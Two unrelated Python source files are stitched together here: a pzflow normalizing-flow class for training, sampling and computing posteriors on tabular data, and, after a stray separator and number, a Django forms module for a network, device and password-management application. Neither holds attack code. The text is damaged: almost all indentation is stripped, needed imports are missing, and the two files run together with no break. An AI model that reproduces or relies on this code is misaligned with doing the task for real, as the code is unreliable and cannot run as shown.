from jax import grad, jit, ops, random
from jax.experimental.optimizers import Optimizer, adam
from pzflow import distributions
from pzflow.bijectors import Bijector_Info, InitFunction, Pytree
from pzflow.utils import build_bijector_from_info, gaussian_error_model
class Flow:
"""A normalizing flow that models tabular data.
Attributes
----------
data_columns : tuple
List of DataFrame columns that the flow expects/produces.
conditional_columns : tuple
List of DataFrame columns on which the flow is conditioned.
info : Any
Object containing any kind of info included with the flow.
Often describes the data the flow is trained on.
latent
The latent distribution of the normalizing flow.
        Has its own sample and log_prob methods.
"""
def __init__(
self,
data_columns: Sequence[str] = None,
bijector: Tuple[InitFunction, Bijector_Info] = None,
conditional_columns: Sequence[str] = None,
latent=None,
data_error_model: Callable = None,
condition_error_model: Callable = None,
autoscale_conditions: bool = True,
seed: int = 0,
info: Any = None,
file: str = None,
_dictionary: dict = None,
):
"""Instantiate a normalizing flow.
Note that while all of the init parameters are technically optional,
you must provide either data_columns and bijector OR file.
In addition, if a file is provided, all other parameters must be None.
Parameters
----------
data_columns : Sequence[str], optional
Tuple, list, or other container of column names.
These are the columns the flow expects/produces in DataFrames.
bijector : Bijector Call, optional
A Bijector call that consists of the bijector InitFunction that
initializes the bijector and the tuple of Bijector Info.
Can be the output of any Bijector, e.g. Reverse(), Chain(...), etc.
conditional_columns : Sequence[str], optional
Names of columns on which to condition the normalizing flow.
latent : distribution, optional
The latent distribution for the normalizing flow. Can be any of
the distributions from pzflow.distributions. If not provided,
a normal distribution is used with the number of dimensions
inferred.
data_error_model : Callable, optional
A callable that defines the error model for data variables.
data_error_model must take key, X, Xerr, nsamples as arguments where:
key is a jax rng key, e.g. jax.random.PRNGKey(0)
X is a 2 dimensional array of data variables, where the order
of variables matches the order of the columns in data_columns
Xerr is the corresponding 2 dimensional array of errors
nsamples is the number of samples to draw from the error distribution
data_error_model must return an array of samples with the shape
(X.shape[0], nsamples, X.shape[1]).
If data_error_model is not provided, a Gaussian error model is assumed.
condition_error_model : Callable, optional
A callable that defines the error model for conditional variables.
condition_error_model must take key, X, Xerr, nsamples as arguments where:
key is a jax rng key, e.g. jax.random.PRNGKey(0)
X is a 2 dimensional array of conditional variables, where the order
of variables matches the order of the columns in conditional_columns
Xerr is the corresponding 2 dimensional array of errors
nsamples is the number of samples to draw from the error distribution
condition_error_model must return an array of samples with the shape
(X.shape[0], nsamples, X.shape[1]).
If condition_error_model is not provided, a Gaussian error model is assumed.
autoscale_conditions : bool, default=True
Sets whether or not conditions are automatically standard scaled when
passed to a conditional flow. I recommend you leave this as True.
seed : int, default=0
The random seed for initial parameters
info : Any, optional
An object to attach to the info attribute.
file : str, optional
Path to file from which to load a pretrained flow.
If a file is provided, all other parameters must be None.
"""
# validate parameters
if (
data_columns is None
and bijector is None
and file is None
and _dictionary is None
):
raise ValueError("You must provide data_columns and bijector OR file.")
if data_columns is not None and bijector is None:
raise ValueError("Please also provide a bijector.")
if data_columns is None and bijector is not None:
raise ValueError("Please also provide data_columns.")
if any(
(
data_columns is not None,
bijector is not None,
conditional_columns is not None,
latent is not None,
data_error_model is not None,
condition_error_model is not None,
info is not None,
)
):
if file is not None:
raise ValueError(
"If providing a file, please do not provide any other parameters."
)
if _dictionary is not None:
raise ValueError(
"If providing a dictionary, please do not provide any other parameters."
)
if file is not None and _dictionary is not None:
raise ValueError("Only provide file or _dictionary, not both.")
# if file or dictionary is provided, load everything from it
if file is not None or _dictionary is not None:
save_dict = self._save_dict()
if file is not None:
with open(file, "rb") as handle:
save_dict.update(pickle.load(handle))
else:
save_dict.update(_dictionary)
if save_dict["class"] != self.__class__.__name__:
raise TypeError(
f"This save file isn't a {self.__class__.__name__}."
+ f"It is a {save_dict['class']}"
)
# load columns and dimensions
self.data_columns = save_dict["data_columns"]
self.conditional_columns = save_dict["conditional_columns"]
self._input_dim = len(self.data_columns)
self.info = save_dict["info"]
# load the latent distribution
self._latent_info = save_dict["latent_info"]
self.latent = getattr(distributions, self._latent_info[0])(
*self._latent_info[1]
)
# load the error models
self.data_error_model = save_dict["data_error_model"]
self.condition_error_model = save_dict["condition_error_model"]
# load the bijector
self._bijector_info = save_dict["bijector_info"]
init_fun, _ = build_bijector_from_info(self._bijector_info)
_, self._forward, self._inverse = init_fun(
random.PRNGKey(0), self._input_dim
)
self._params = save_dict["params"]
# load the conditional means and stds
self._condition_means = save_dict["condition_means"]
self._condition_stds = save_dict["condition_stds"]
# set whether or not to automatically standard scale any
# conditions passed to the normalizing flow
self._autoscale_conditions = save_dict["autoscale_conditions"]
# if no file is provided, use provided parameters
else:
self.data_columns = tuple(data_columns)
self._input_dim = len(self.data_columns)
self.info = info
if conditional_columns is None:
self.conditional_columns = None
self._condition_means = None
self._condition_stds = None
else:
self.conditional_columns = tuple(conditional_columns)
self._condition_means = np.zeros(len(self.conditional_columns))
self._condition_stds = np.ones(len(self.conditional_columns))
# set whether or not to automatically standard scale any
# conditions passed to the normalizing flow
self._autoscale_conditions = autoscale_conditions
# set up the latent distribution
if latent is None:
self.latent = distributions.Normal(self._input_dim)
else:
self.latent = latent
self._latent_info = self.latent.info
# set up the error models
if data_error_model is None:
self.data_error_model = gaussian_error_model
else:
self.data_error_model = data_error_model
if condition_error_model is None:
self.condition_error_model = gaussian_error_model
else:
self.condition_error_model = condition_error_model
# set up the bijector with random params
init_fun, self._bijector_info = bijector
bijector_params, self._forward, self._inverse = init_fun(
random.PRNGKey(seed), self._input_dim
)
self._params = (self.latent._params, bijector_params)
def _get_conditions(self, inputs: pd.DataFrame) -> np.ndarray:
"""Return an array of the bijector conditions."""
# if this isn't a conditional flow, just return empty conditions
if self.conditional_columns is None:
conditions = np.zeros((inputs.shape[0], 1))
# if this a conditional flow, return an array of the conditions
else:
columns = list(self.conditional_columns)
conditions = np.array(inputs[columns].values)
conditions = (conditions - self._condition_means) / self._condition_stds
return conditions
def _get_err_samples(
self,
key,
inputs: pd.DataFrame,
err_samples: int,
type: str = "data",
skip: str = None,
) -> np.ndarray:
"""Draw error samples for each row of inputs. """
X = inputs.copy()
# get list of columns
if type == "data":
columns = list(self.data_columns)
error_model = self.data_error_model
elif type == "conditions":
if self.conditional_columns is None:
return np.zeros((err_samples * X.shape[0], 1))
else:
columns = list(self.conditional_columns)
error_model = self.condition_error_model
else:
raise ValueError("type must be `data` or `conditions`.")
# make sure all relevant variables have error columns
for col in columns:
# if errors not provided for the column, fill in zeros
if f"{col}_err" not in inputs.columns and col != skip:
X[f"{col}_err"] = np.zeros(X.shape[0])
# if we are skipping this column, fill in nan's
elif col == skip:
X[col] = np.nan * np.zeros(X.shape[0])
X[f"{col}_err"] = np.nan * np.zeros(X.shape[0])
# pull out relevant columns
err_columns = [col + "_err" for col in columns]
X, Xerr = np.array(X[columns].values), np.array(X[err_columns].values)
# generate samples
Xsamples = error_model(key, X, Xerr, err_samples)
Xsamples = Xsamples.reshape(X.shape[0] * err_samples, X.shape[1])
# delete the column corresponding to skip
if skip is not None:
idx = columns.index(skip)
Xsamples = np.delete(Xsamples, idx, axis=1)
# if these are samples of conditions, standard scale them!
if type == "conditions":
Xsamples = (Xsamples - self._condition_means) / self._condition_stds
return Xsamples
def _log_prob(
self, params: Pytree, inputs: np.ndarray, conditions: np.ndarray
) -> np.ndarray:
"""Log prob for arrays."""
# calculate log_prob
u, log_det = self._forward(params[1], inputs, conditions=conditions)
log_prob = self.latent.log_prob(params[0], u) + log_det
# set NaN's to negative infinity (i.e. zero probability)
log_prob = np.nan_to_num(log_prob, nan=np.NINF)
return log_prob
def log_prob(
self, inputs: pd.DataFrame, err_samples: int = None, seed: int = None
) -> np.ndarray:
"""Calculates log probability density of inputs.
Parameters
----------
inputs : pd.DataFrame
Input data for which log probability density is calculated.
Every column in self.data_columns must be present.
If self.conditional_columns is not None, those must be present
as well. If other columns are present, they are ignored.
err_samples : int, default=None
Number of samples from the error distribution to average over for
the log_prob calculation. If provided, Gaussian errors are assumed,
and method will look for error columns in `inputs`. Error columns
must end in `_err`. E.g. the error column for the variable `u` must
be `u_err`. Zero error assumed for any missing error columns.
seed : int, default=None
Random seed for drawing the samples with Gaussian errors.
Returns
-------
np.ndarray
Device array of shape (inputs.shape[0],).
"""
if err_samples is None:
# convert data to an array with columns ordered
columns = list(self.data_columns)
X = np.array(inputs[columns].values)
# get conditions
conditions = self._get_conditions(inputs)
# calculate log_prob
return self._log_prob(self._params, X, conditions)
else:
# validate nsamples
assert isinstance(
err_samples, int
), "err_samples must be a positive integer."
assert err_samples > 0, "err_samples must be a positive integer."
# get Gaussian samples
seed = onp.random.randint(1e18) if seed is None else seed
key = random.PRNGKey(seed)
X = self._get_err_samples(key, inputs, err_samples, type="data")
C = self._get_err_samples(key, inputs, err_samples, type="conditions")
# calculate log_probs
log_probs = self._log_prob(self._params, X, C)
probs = np.exp(log_probs.reshape(-1, err_samples))
return np.log(probs.mean(axis=1))
def posterior(
self,
inputs: pd.DataFrame,
column: str,
grid: np.ndarray,
marg_rules: dict = None,
normalize: bool = True,
err_samples: int = None,
seed: int = None,
batch_size: int = None,
nan_to_zero: bool = True,
) -> np.ndarray:
"""Calculates posterior distributions for the provided column.
Calculates the conditional posterior distribution, assuming the
data values in the other columns of the DataFrame.
Parameters
----------
inputs : pd.DataFrame
Data on which the posterior distributions are conditioned.
Must have columns matching self.data_columns, *except*
for the column specified for the posterior (see below).
column : str
Name of the column for which the posterior distribution
is calculated. Must be one of the columns in self.data_columns.
However, whether or not this column is one of the columns in
`inputs` is irrelevant.
grid : np.ndarray
Grid on which to calculate the posterior.
marg_rules : dict, optional
Dictionary with rules for marginalizing over missing variables.
The dictionary must contain the key "flag", which gives the flag
that indicates a missing value. E.g. if missing values are given
the value 99, the dictionary should contain {"flag": 99}.
The dictionary must also contain {"name": callable} for any
variables that will need to be marginalized over, where name is
the name of the variable, and callable is a callable that takes
            the row of variables and returns a grid over which to marginalize
the variable. E.g. {"y": lambda row: np.linspace(0, row["x"], 10)}.
Note: the callable for a given name must *always* return an array
of the same length, regardless of the input row.
err_samples : int, default=None
Number of samples from the error distribution to average over for
the posterior calculation. If provided, Gaussian errors are assumed,
and method will look for error columns in `inputs`. Error columns
must end in `_err`. E.g. the error column for the variable `u` must
be `u_err`. Zero error assumed for any missing error columns.
seed : int, default=None
Random seed for drawing the samples with Gaussian errors.
batch_size : int, default=None
Size of batches in which to calculate posteriors. If None, all
posteriors are calculated simultaneously. Simultaneous calculation
is faster, but memory intensive for large data sets.
normalize : boolean, default=True
Whether to normalize the posterior so that it integrates to 1.
nan_to_zero : bool, default=True
Whether to convert NaN's to zero probability in the final pdfs.
Returns
-------
np.ndarray
Device array of shape (inputs.shape[0], grid.size).
"""
# get the index of the provided column, and remove it from the list
columns = list(self.data_columns)
idx = columns.index(column)
columns.remove(column)
nrows = inputs.shape[0]
batch_size = nrows if batch_size is None else batch_size
# make sure indices run 0 -> nrows
inputs = inputs.reset_index(drop=True)
if err_samples is not None:
# validate nsamples
assert isinstance(
err_samples, int
), "err_samples must be a positive integer."
assert err_samples > 0, "err_samples must be a positive integer."
# set the seed
seed = onp.random.randint(1e18) if seed is None else seed
key = random.PRNGKey(seed)
# empty array to hold pdfs
pdfs = np.zeros((nrows, len(grid)))
# if marginalization rules were passed, we will loop over the rules
# and repeatedly call this method
if marg_rules is not None:
# if the flag is NaN, we must use np.isnan to check for flags
if onp.isnan(marg_rules["flag"]):
def check_flags(data):
return onp.isnan(data)
# else we use np.isclose to check for flags
else:
def check_flags(data):
return onp.isclose(data, marg_rules["flag"])
# first calculate pdfs for unflagged rows
unflagged_idx = inputs[
~check_flags(inputs[columns]).any(axis=1)
].index.tolist()
unflagged_pdfs = self.posterior(
inputs=inputs.iloc[unflagged_idx],
column=column,
grid=grid,
err_samples=err_samples,
seed=seed,
batch_size=batch_size,
normalize=False,
nan_to_zero=nan_to_zero,
)
# save these pdfs in the big array
pdfs = ops.index_update(
pdfs,
ops.index[unflagged_idx, :],
unflagged_pdfs,
indices_are_sorted=True,
unique_indices=True,
)
# we will keep track of all the rows we've already calculated
# posteriors for
already_done = unflagged_idx
# now we will loop over the rules in marg_rules
for name, rule in marg_rules.items():
# ignore the flag, because that's not a column in the data
if name == "flag":
continue
# get the list of new rows for which we need to calculate posteriors
flagged_idx = inputs[check_flags(inputs[name])].index.tolist()
flagged_idx = list(set(flagged_idx).difference(already_done))
# if flagged_idx is empty, move on!
if len(flagged_idx) == 0:
continue
# get the marginalization grid for each row
marg_grids = (
inputs.iloc[flagged_idx]
.apply(rule, axis=1, result_type="expand")
.values
)
# make a new data frame with the marginalization grids replacing
# the values of the flag in the column
marg_inputs = pd.DataFrame(
np.repeat(
inputs.iloc[flagged_idx].values, marg_grids.shape[1], axis=0
),
columns=inputs.columns,
)
marg_inputs[name] = marg_grids.reshape(marg_inputs.shape[0], 1)
# remove the error column if it's present
marg_inputs.drop(f"{name}_err", axis=1, inplace=True, errors="ignore")
# calculate posteriors for these
marg_pdfs = self.posterior(
inputs=marg_inputs,
column=column,
grid=grid,
marg_rules=marg_rules,
err_samples=err_samples,
seed=seed,
batch_size=batch_size,
normalize=False,
nan_to_zero=nan_to_zero,
)
# sum over the marginalized dimension
marg_pdfs = marg_pdfs.reshape(
len(flagged_idx), marg_grids.shape[1], grid.size
)
marg_pdfs = marg_pdfs.sum(axis=1)
# save the new pdfs in the big array
pdfs = ops.index_update(
pdfs,
ops.index[flagged_idx, :],
marg_pdfs,
indices_are_sorted=True,
unique_indices=True,
)
# add these flagged indices to the list of rows already done
already_done += flagged_idx
# now for the main posterior calculation loop
else:
# loop through batches
for batch_idx in range(0, nrows, batch_size):
# get the data batch
                # and, if this is a conditional flow, the corresponding conditions
batch = inputs.iloc[batch_idx : batch_idx + batch_size]
# if not drawing samples, just grab batch and conditions
if err_samples is None:
conditions = self._get_conditions(batch)
batch = np.array(batch[columns].values)
# if only drawing condition samples...
elif len(self.data_columns) == 1:
conditions = self._get_err_samples(
key, batch, err_samples, type="conditions"
)
batch = np.repeat(batch[columns].values, err_samples, axis=0)
# if drawing data and condition samples...
else:
conditions = self._get_err_samples(
key, batch, err_samples, type="conditions"
)
batch = self._get_err_samples(
key, batch, err_samples, skip=column, type="data"
)
# make a new copy of each row for each value of the column
# for which we are calculating the posterior
batch = np.hstack(
(
np.repeat(batch[:, :idx], len(grid), axis=0,),
np.tile(grid, len(batch))[:, None],
np.repeat(batch[:, idx:], len(grid), axis=0,),
)
)
# make similar copies of the conditions
conditions = np.repeat(conditions, len(grid), axis=0)
# calculate probability densities
log_prob = self._log_prob(self._params, batch, conditions).reshape(
(-1, len(grid))
)
prob = np.exp(log_prob)
# if we were Gaussian sampling, average over the samples
if err_samples is not None:
prob = prob.reshape(-1, err_samples, len(grid))
prob = prob.mean(axis=1)
# add the pdfs to the bigger list
pdfs = ops.index_update(
pdfs,
ops.index[batch_idx : batch_idx + batch_size, :],
prob,
indices_are_sorted=True,
unique_indices=True,
)
if normalize:
# normalize so they integrate to one
pdfs = pdfs / np.trapz(y=pdfs, x=grid).reshape(-1, 1)
if nan_to_zero:
# set NaN's equal to zero probability
pdfs = np.nan_to_num(pdfs, nan=0.0)
return pdfs
def sample(
self,
nsamples: int = 1,
conditions: pd.DataFrame = None,
save_conditions: bool = True,
seed: int = None,
) -> pd.DataFrame:
"""Returns samples from the normalizing flow.
Parameters
----------
nsamples : int, default=1
The number of samples to be returned.
conditions : pd.DataFrame, optional
If this is a conditional flow, you must pass conditions for
each sample. nsamples will be drawn for each row in conditions.
save_conditions : bool, default=True
If true, conditions will be saved in the DataFrame of samples
that is returned.
seed : int, optional
Sets the random seed for the samples.
Returns
-------
pd.DataFrame
Pandas DataFrame of samples.
"""
# validate nsamples
assert isinstance(nsamples, int), "nsamples must be a positive integer."
assert nsamples > 0, "nsamples must be a positive integer."
if self.conditional_columns is not None and conditions is None:
raise ValueError(
f"Must provide the following conditions\n{self.conditional_columns}"
)
# if this isn't a conditional flow, get empty conditions
if self.conditional_columns is None:
conditions = np.zeros((nsamples, 1))
# otherwise get conditions and make `nsamples` copies of each
else:
conditions = self._get_conditions(conditions)
conditions = np.repeat(conditions, nsamples, axis=0)
# draw from latent distribution
u = self.latent.sample(self._params[0], conditions.shape[0], seed)
# take the inverse back to the data distribution
x = self._inverse(self._params[1], u, conditions=conditions)[0]
# if not conditional, or save_conditions is False, this is all we need
if self.conditional_columns is None or save_conditions is False:
x = pd.DataFrame(x, columns=self.data_columns)
# but if conditional and save_conditions is True,
# save conditions with samples
else:
            # unscale the conditions
conditions = conditions * self._condition_stds + self._condition_means
x = pd.DataFrame(
np.hstack((x, conditions)),
columns=self.data_columns + self.conditional_columns,
)
# return the samples!
return x
def _save_dict(self):
"""Returns the dictionary of all flow params to be saved."""
save_dict = {"class": self.__class__.__name__}
keys = [
"data_columns",
"conditional_columns",
"condition_means",
"condition_stds",
"data_error_model",
"condition_error_model",
"autoscale_conditions",
"info",
"latent_info",
"bijector_info",
"params",
]
for key in keys:
try:
save_dict[key] = getattr(self, key)
except AttributeError:
try:
save_dict[key] = getattr(self, "_" + key)
except AttributeError:
save_dict[key] = None
return save_dict
def save(self, file: str):
"""Saves the flow to a file.
Pickles the flow and saves it to a file that can be passed as
the `file` argument during flow instantiation.
WARNING: Currently, this method only works for bijectors that are
implemented in the `bijectors` module. If you want to save a flow
with a custom bijector, you either need to add the bijector to that
module, or handle the saving and loading on your end.
Parameters
----------
file : str
Path to where the flow will be saved.
Extension `.pkl` will be appended if not already present.
"""
save_dict = self._save_dict()
with open(file, "wb") as handle:
pickle.dump(save_dict, handle, recurse=True)
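        # Sketch (assumption): a flow saved this way can be restored later by
        # passing the same path back to the constructor, e.g.
        # Flow(file="my_flow.pkl"); the filename here is illustrative only.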
def train(
self,
inputs: pd.DataFrame,
epochs: int = 50,
batch_size: int = 1024,
optimizer: Optimizer = None,
loss_fn: Callable = None,
convolve_errs: bool = False,
seed: int = 0,
verbose: bool = False,
) -> list:
"""Trains the normalizing flow on the provided inputs.
Parameters
----------
inputs : pd.DataFrame
Data on which to train the normalizing flow.
Must have columns matching self.data_columns.
epochs : int, default=50
Number of epochs to train.
batch_size : int, default=1024
Batch size for training.
optimizer : jax Optimizer, default=adam(step_size=1e-3)
An optimizer from jax.experimental.optimizers.
loss_fn : Callable, optional
A function to calculate the loss: loss = loss_fn(params, x).
If not provided, will be -mean(log_prob).
convolve_errs : bool, default=False
Whether to draw new data from the error distributions during
each epoch of training. Assumes errors are Gaussian, and method
will look for error columns in `inputs`. Error columns must end
in `_err`. E.g. the error column for the variable `u` must be
`u_err`. Zero error assumed for any missing error columns.
seed : int, default=0
A random seed to control the batching and the (optional)
error sampling.
verbose : bool, default=False
If true, print the training loss every 5% of epochs.
Returns
-------
list
List of training losses from every epoch.
"""
# validate epochs
if not isinstance(epochs, int) or epochs <= 0:
raise ValueError("epochs must be a positive integer.")
# if no loss_fn is provided, use the default loss function
if loss_fn is None:
@jit
def loss_fn(params, x, c):
return -np.mean(self._log_prob(params, x, c))
# initialize the optimizer
optimizer = adam(step_size=1e-3) if optimizer is None else optimizer
opt_init, opt_update, get_params = optimizer
opt_state = opt_init(self._params)
# define the training step function
@jit
def step(i, opt_state, x, c):
params = get_params(opt_state)
gradients = grad(loss_fn)(params, x, c)
return opt_update(i, gradients, opt_state)
# get list of data columns
columns = list(self.data_columns)
# if this is a conditional flow, and autoscale_conditions == True
# save the means and stds of the conditional columns
if self.conditional_columns is not None and self._autoscale_conditions:
self._condition_means = np.array(
inputs[list(self.conditional_columns)].values.mean(axis=0)
)
condition_stds = np.array(
inputs[list(self.conditional_columns)].values.std(axis=0)
)
self._condition_stds = np.where(condition_stds != 0, condition_stds, 1)
# define a function to return batches
if convolve_errs:
def get_batch(sample_key, x, type):
return self._get_err_samples(sample_key, x, 1, type=type)
else:
def get_batch(sample_key, x, type):
if type == "conditions":
return self._get_conditions(x)
else:
return np.array(x[columns].values)
# get random seed for training loop
key = random.PRNGKey(seed)
if verbose:
print(f"Training {epochs} epochs \nLoss:")
# save the initial loss
X = np.array(inputs[columns].values)
C = self._get_conditions(inputs)
losses = [loss_fn(self._params, X, C)]
if verbose:
print(f"(0) {losses[-1]:.4f}")
# loop through training
itercount = itertools.count()
for epoch in range(epochs):
# new permutation of batches
permute_key, sample_key, key = random.split(key, num=3)
idx = random.permutation(permute_key, inputs.shape[0])
X = inputs.iloc[idx]
# loop through batches and step optimizer
for batch_idx in range(0, len(X), batch_size):
# if sampling from the error distribution, this returns a
# Gaussian sample of the batch. Else just returns batch as a
# jax array
batch = get_batch(
sample_key, X.iloc[batch_idx : batch_idx + batch_size], type="data"
)
batch_conditions = get_batch(
sample_key,
X.iloc[batch_idx : batch_idx + batch_size],
type="conditions",
)
opt_state = step(next(itercount), opt_state, batch, batch_conditions,)
# save end-of-epoch training loss
params = get_params(opt_state)
losses.append(
loss_fn(params, np.array(X[columns].values), self._get_conditions(X),)
)
if verbose and (
epoch % max(int(0.05 * epochs), 1) == 0 or (epoch + 1) == epochs
):
print(f"({epoch+1}) {losses[-1]:.4f}")
# update the flow parameters with the final training state
self._params = get_params(opt_state)
return losses
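# Sketch (assumption): minimal end-to-end usage of Flow. The toy DataFrame and
# the simple Reverse() bijector (mentioned in the __init__ docstring) are
# illustrative only; a real model would use a more expressive bijector chain.
if __name__ == "__main__":
    from pzflow.bijectors import Reverse

    demo_data = pd.DataFrame(
        onp.random.normal(size=(128, 2)), columns=["x", "y"]
    )
    demo_flow = Flow(data_columns=["x", "y"], bijector=Reverse())
    demo_losses = demo_flow.train(demo_data, epochs=5, batch_size=32, verbose=True)
    demo_samples = demo_flow.sample(10, seed=0)
    demo_pdfs = demo_flow.posterior(demo_data, column="x", grid=np.linspace(-3, 3, 101))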
|
38584
|
from django import forms
class EmptyForm(forms.Form):
pass
class LoginForm(forms.Form):
username = forms.CharField(
max_length=50,
label='Username'
)
password = forms.CharField(
max_length=32,
label='Password',
widget=forms.PasswordInput(),
required=True
)
class DeleteForm(forms.Form):
verify = forms.CharField(
initial='true',
widget=forms.HiddenInput()
)
class ConfirmForm(forms.Form):
verify = forms.CharField(
initial='true',
widget=forms.HiddenInput()
)
class ViewAddForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class ViewUpdateForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class ViewSearchForm(forms.Form):
searchstring = forms.CharField(
max_length=50,
required=True,
widget=forms.TextInput(attrs={'id': 'searchbox'})
)
class ViewAdvancedSearchForm(forms.Form):
searchAttribute = forms.CharField(
max_length=50,
required=True
)
searchValue = forms.CharField(
max_length=50,
required=False
)
attributesList = forms.CharField(
max_length=256,
required=False
)
OPTIONS = (
('devices', 'devices'),
('device categories', 'device categories'),
('passwords', 'passwords'),
('password categories', 'password categories'),
('networks', 'networks')
)
displayTypes = forms.MultipleChoiceField(
choices=OPTIONS,
required=False
)
class NetworkTreeAddForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
protocol = forms.ChoiceField(
label='Protocol',
choices=(('ipv4', 'ipv4'), ('ipv6', 'ipv6'))
)
class NetworkAddForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Address',
help_text='The network/address in CIDR form (x.x.x.x or x.x.x.x/xx)'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class NetworkRangeAddForm(forms.Form):
range = forms.CharField(
max_length=50,
label='Range'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class NetworkDeleteForm(forms.Form):
recursive = forms.BooleanField(
label='Recursive delete',
required=False
)
class PasswordKeyAddForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
key = forms.CharField(
max_length=32,
label='Key',
widget=forms.PasswordInput(),
required=False
)
validate = forms.CharField(
max_length=32,
label='Key (again)',
widget=forms.PasswordInput(),
required=False
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class CounterAddBasicForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class CounterAddLoopingForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
values = forms.CharField(
max_length=5000,
label='Values',
help_text='one value per row',
widget=forms.Textarea(attrs={'cols':'30', 'rows': '5'})
)
class CounterUpdateBasicForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
value = forms.DecimalField(
min_value=0,
decimal_places=0,
label='Value'
)
class CounterUpdateLoopingForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
value = forms.CharField(
max_length=50,
label='Value'
)
values = forms.CharField(
max_length=5000,
label='Values',
help_text='one value per row',
widget=forms.Textarea(attrs={'cols':'30', 'rows': '5'})
)
class CounterSetForm(forms.Form):
value = forms.DecimalField(
min_value=0,
decimal_places=0,
label='Value'
)
class PasswordAddForm(forms.Form):
pw_username = forms.CharField(
max_length=50,
label='Username',
required=False
)
pw_password = forms.CharField(
max_length=250,
label='Password',
widget=forms.PasswordInput(),
required=False,
help_text='Max length: 250, leave empty for generated password.'
)
validate = forms.CharField(
max_length=250,
label='Password (again)',
widget=forms.PasswordInput(),
required=False
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
def __init__(self, password_keys, *args, **kwargs):
super(PasswordAddForm, self).__init__(*args, **kwargs)
keylist = [('__no-password-key__', 'None')]
for key in password_keys:
value = (key.oid, key.attributes['name'])
if key.attributes.get('default', False) is True:
keylist.insert(0, value)
else:
keylist.append(value)
field = forms.ChoiceField(
label='Password key',
choices=keylist
)
self.fields['passwordkey'] = field
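        # Note (assumption about callers): because the 'passwordkey' choices are
        # built at runtime, views are expected to pass the available password
        # keys first, e.g. PasswordAddForm(password_keys, request.POST or None).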
class PasswordUpdateForm(forms.Form):
pw_username = forms.CharField(max_length = 50, label = 'Username',
required = False)
pw_password = forms.CharField(max_length = 250, label = 'Password',
widget = forms.PasswordInput(), required = False,
help_text = 'Max length: 250, leave empty for generated password.')
validate = forms.CharField(max_length = 250, label = 'Password (again)',
widget = forms.PasswordInput(), required = False)
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
def __init__(self, password_keys, *args, **kwargs):
super(PasswordUpdateForm, self).__init__(*args, **kwargs)
keylist = [('__no-password-key__', 'None')]
for key in password_keys:
value = (key.oid, key.attributes['name'])
if key.attributes.get('default', False) is True:
keylist.insert(0, value)
else:
keylist.append(value)
field = forms.ChoiceField(label = 'Password key', choices = keylist)
self.fields['passwordkey'] = field
class DeviceTemplateAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this template.', required = False)
inheritance_only = forms.BooleanField(label = 'Inheritance only',
required = False,
initial = False,
help_text = 'Template is used for inheritance only.')
device_creation = forms.BooleanField(label = 'Device creation',
required = False,
initial = False,
help_text = 'Template is used for device creation.')
def __init__(self, templates, *args, **kwargs):
super(DeviceTemplateAddForm, self).__init__(*args, **kwargs)
choices = []
for template in templates:
choices.append((template.oid,
                            template.attributes.get('name', '[UNKNOWN]')))
field = forms.MultipleChoiceField(required = False,
label = 'Inherited templates',
choices = choices)
self.fields['inherited_templates'] = field
class NetworkTemplateAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this template.', required = False)
inheritance_only = forms.BooleanField(label = 'Inheritance only',
required = False,
initial = False,
help_text = 'Template is used for inheritance only.')
def __init__(self, templates, *args, **kwargs):
super(NetworkTemplateAddForm, self).__init__(*args, **kwargs)
choices = []
for template in templates:
choices.append((template.oid,
                            template.attributes.get('name', '[UNKNOWN]')))
field = forms.MultipleChoiceField(required = False,
label = 'Inherited templates',
choices = choices)
self.fields['inherited_templates'] = field
class DeviceTemplateUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this template.', required = False)
inheritance_only = forms.BooleanField(label = 'Inheritance only',
required = False,
initial = False,
help_text = 'Template is used for inheritance only.')
device_creation = forms.BooleanField(label = 'Device creation',
required = False,
initial = False,
help_text = 'Template is used for device creation.')
def __init__(self, templates, *args, **kwargs):
super(DeviceTemplateUpdateForm, self).__init__(*args, **kwargs)
choices = []
for template in templates:
choices.append((template.oid,
                            template.attributes.get('name', '[UNKNOWN]')))
field = forms.MultipleChoiceField(required = False,
label = 'Inherited templates',
choices = choices)
self.fields['inherited_templates'] = field
class NetworkTemplateUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this template.', required = False)
inheritance_only = forms.BooleanField(label = 'Inheritance only',
required = False,
initial = False,
help_text = 'Template is used for inheritance only.')
def __init__(self, templates, *args, **kwargs):
super(NetworkTemplateUpdateForm, self).__init__(*args, **kwargs)
choices = []
for template in templates:
choices.append((template.oid,
                            template.attributes.get('name', '[UNKNOWN]')))
field = forms.MultipleChoiceField(required = False,
label = 'Inherited templates',
choices = choices)
self.fields['inherited_templates'] = field
class TemplateRuleTextAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
hidden = forms.BooleanField(label = 'Hide attribute',
required = False,
initial = False,
        help_text = 'If true, the attribute will be hidden by default if it is large/wikitext.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
